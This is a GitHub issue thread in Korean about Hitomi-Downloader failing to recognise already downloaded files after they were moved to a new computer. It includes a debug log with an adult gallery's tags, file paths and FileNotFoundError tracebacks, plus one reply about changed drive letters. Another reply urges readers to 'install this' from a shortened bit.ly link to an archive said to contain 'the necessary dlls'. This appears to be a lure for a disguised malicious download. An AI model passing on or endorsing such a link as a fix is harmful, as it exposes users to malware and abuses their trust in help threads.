### ISSUE TITLE
컴퓨터 교체 후 이미 받았던 파일을 이동시켰는데 인식이 안됍니다.

### ISSUE THREAD

**Issue by rlaaudtjq899** [KurtBestor/Hitomi-Downloader#7504]
컴퓨터를 아예 교체하게 되어서 hdd를 연결하여 새로운 컴퓨터 ssd에 받았던 파일들을 모두 옮겼습니다. 그 후에 새로 히토미 다운로더를 설치하여 작업 가져오기로 목록들은 잘 불러왔는데, 다운로더 내에서 파일을 눌러보면 
"파일이 없습니다" 라고 뜹니다.

그런데 저장된 경로로 들어가보면 다운로드된 파일은 온전히 남아있습니다.

그래서 다운로더 내에서 "다시 시작"을 누르면 0.0kb에서 다시 받아지지가 않습니다. (무한로딩)

물론 완전히 새로운 파일들은 받으면 잘 다운로드 됩니다.

보니깐 '다시시작'을 누르면 전 컴퓨터에서의 경로가 있어야 다운로드 되는거같은데

저장위치를 옮겨도 가지고있는 파일을 다시 다운로더 프로그램에 인식시키는 방법이 있을까요?

아래는 "다시시작" 을 누르면 Fail 이라고 빨간글자가 뜹니다.

[Ie] Hime to Yuusha to Okaa-sama (2963624)

version: 4.1 (24-02-28 04:49:54 UTC)
platform / locale: Windows-10-10.0.22631-SP0 / ko_kr
order / group / uid: 80 / False / 258e58dbde644ba09fed70727b502354
input: https://hitomi.la/doujinshi/hime-to-yuusha-to-okaa-sama-%ED%95%9C%EA%B5%AD%EC%96%B4-2963624.html#1
type: hitomi
single: False
url: https://hitomi.la/galleries/2963624.html
dir: F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)
zip: 
artist: ie
valid / done: True / False
range / range_p: None / None
time: 1726745253.5352821 (24-09-19 11:27:33 UTC) - 5s elapsed
tags: []
lock: False
color: downloading
paused: False
format: None
p2f: None
segment: None
admin: True
goodbyedpi: True
ytdl: yt_dlp 2024.08.06
pinned: False
extras: {}
live: False
changed: True

[Gallery]
갤러리 넘버: 2963624

제목: Hime to Yuusha to Okaa-sama

작가: ie

그룹: N/A

타입: doujinshi

시리즈: original

캐릭터: N/A

태그: ffm threesome, female:big breasts, female:oyakodon

언어: Korean

[File Names]
[0001] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\01.webp
[0002] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\02.webp
[0003] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\03.webp
[0004] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\04.webp
[0005] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\05.webp
[0006] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\06.webp
[0007] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\07.webp
[0008] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\08.webp
[0009] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\09.webp
[0010] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\10.webp
[0011] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\11.webp
[0012] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\12.webp
[0013] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\13.webp
[0014] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\14.webp
[0015] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\15.webp
[0016] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\16.webp
[0017] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\17.webp
[0018] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\18.webp
[0019] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\19.webp
[0020] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\20.webp
[0021] F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\21.webp

[URLs]
[0001] LazyUrl(https://hitomi.la/reader/2963624.html)    --->    https://aa.hitomi.la/webp/1726743602/1741/4946c307713ffd0d804f758fcaafb9ab69d633c41bb3f63313f979e9cc098cd6.webp
[0002] LazyUrl(https://hitomi.la/reader/2963624.html)    --->    https://aa.hitomi.la/webp/1726743602/3854/434db721962576394a31cbc159b5b61c634817f9099436436184fdf0e6dfc0ef.webp
[0003] LazyUrl(https://hitomi.la/reader/2963624.html)
[0004] LazyUrl(https://hitomi.la/reader/2963624.html)
[0005] LazyUrl(https://hitomi.la/reader/2963624.html)
[0006] LazyUrl(https://hitomi.la/reader/2963624.html)
[0007] LazyUrl(https://hitomi.la/reader/2963624.html)
[0008] LazyUrl(https://hitomi.la/reader/2963624.html)
[0009] LazyUrl(https://hitomi.la/reader/2963624.html)
[0010] LazyUrl(https://hitomi.la/reader/2963624.html)
[0011] LazyUrl(https://hitomi.la/reader/2963624.html)
[0012] LazyUrl(https://hitomi.la/reader/2963624.html)
[0013] LazyUrl(https://hitomi.la/reader/2963624.html)
[0014] LazyUrl(https://hitomi.la/reader/2963624.html)
[0015] LazyUrl(https://hitomi.la/reader/2963624.html)
[0016] LazyUrl(https://hitomi.la/reader/2963624.html)
[0017] LazyUrl(https://hitomi.la/reader/2963624.html)
[0018] LazyUrl(https://hitomi.la/reader/2963624.html)
[0019] LazyUrl(https://hitomi.la/reader/2963624.html)
[0020] LazyUrl(https://hitomi.la/reader/2963624.html)
[0021] LazyUrl(https://hitomi.la/reader/2963624.html)

[Messages]
get_imgs server: hitomi:aa
FINAL SERVER: hitomi
ehen_url: None
imgs: 21

Fail : \\?\F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\01.webp
Traceback (most recent call last):
 File "downloader", line 1185, in download
 File "downloader", line 717, in __init__
FileNotFoundError: [Errno 2] No such file or directory: '\\\\?\\F:\\책\\[Ie] Hime to Yuusha to Okaa-sama (2963624)\\01.webp'

Fail : \\?\F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\02.webp
Traceback (most recent call last):
 File "downloader", line 1185, in download
 File "downloader", line 717, in __init__
FileNotFoundError: [Errno 2] No such file or directory: '\\\\?\\F:\\책\\[Ie] Hime to Yuusha to Okaa-sama (2963624)\\02.webp'

retry (1)
use alternative url: https://aa.hitomi.la/webp/1726743602/1741/4946c307713ffd0d804f758fcaafb9ab69d633c41bb3f63313f979e9cc098cd6.webp --> https://aa.hitomi.la/webp/1726743602/1741/4946c307713ffd0d804f758fcaafb9ab69d633c41bb3f63313f979e9cc098cd6.webp
retry (1)
use alternative url: https://aa.hitomi.la/webp/1726743602/3854/434db721962576394a31cbc159b5b61c634817f9099436436184fdf0e6dfc0ef.webp --> https://aa.hitomi.la/webp/1726743602/3854/434db721962576394a31cbc159b5b61c634817f9099436436184fdf0e6dfc0ef.webp

Fail : \\?\F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\01.webp
Traceback (most recent call last):
 File "downloader", line 1185, in download
 File "downloader", line 717, in __init__
FileNotFoundError: [Errno 2] No such file or directory: '\\\\?\\F:\\책\\[Ie] Hime to Yuusha to Okaa-sama (2963624)\\01.webp'

Fail : \\?\F:\책\[Ie] Hime to Yuusha to Okaa-sama (2963624)\02.webp
Traceback (most recent call last):
 File "downloader", line 1185, in download
 File "downloader", line 717, in __init__
FileNotFoundError: [Errno 2] No such file or directory: '\\\\?\\F:\\책\\[Ie] Hime to Yuusha to Okaa-sama (2963624)\\02.webp'

**Comment by Buqra55** [comment]
install this
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive

**Comment by Summertoohot** [comment]
경로를 잘 확인해보세요 ssd면 드라이브 경로가 달라졌을거임
폴더경로말고 드라이브경로 
SSD가 C드라이브 1번폴더였으면
HDD가 D드라이브 1번폴더로 만들어도 인식안됨
드라이브경로가 달라서
